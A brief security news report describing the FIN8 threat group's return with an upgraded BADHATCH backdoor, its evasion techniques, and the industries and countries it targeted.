FIN8, a financially motivated threat actor that’s back in action after a year-and-a-half hiatus with a powerful version of a backdoor with upgraded capabilities including screen capturing, proxy tunneling, credential theft, and fileless execution.

FIN8 is known for its attacks against the retail, hospitality, and entertainment industries while making use of a wide array of techniques such as spear-phishing and malicious tools like PUNCHTRACK and BADHATCH to steal payment card data from point-of-sale (POS) systems.

The FIN8 group is known for taking long breaks to improve TTPs and increase their rate of success.The BADHATCH malware is a mature, highly advanced backdoor that uses several evasion and defense techniques. The new backdoor also attempts to evade security monitoring by using TLS encryption to conceal Powershell commands.

BADHATCH, has been deployed as an implant capable of running attacker supplied commands retrieved from a remote server, in addition to injecting malicious DLLs in a current process, gathering system information, and exfiltrating data to the server.

The researchers said the latest version of BADHATCH abuses a legitimate service called sslp.io to thwart detection during the deployment process, using it to download a PowerShell script, which in turn executes the shellcode containing the BADHATCH DLL.

The PowerShell script, besides taking responsibility for achieving persistence, also takes care of privilege escalation to ensure that all commands post the script’s execution are run as the SYSTEM user.

A second evasion technique adopted by FIN8 involves passing off communications with the command-and-control (C2) server that masquerade as legitimate HTTP requests. The new wave of attacks is said to have taken place over the past year and directed against insurance, retail, technology, and chemical industries in the U.S., Canada, South Africa, Puerto Rico, Panama, and Italy.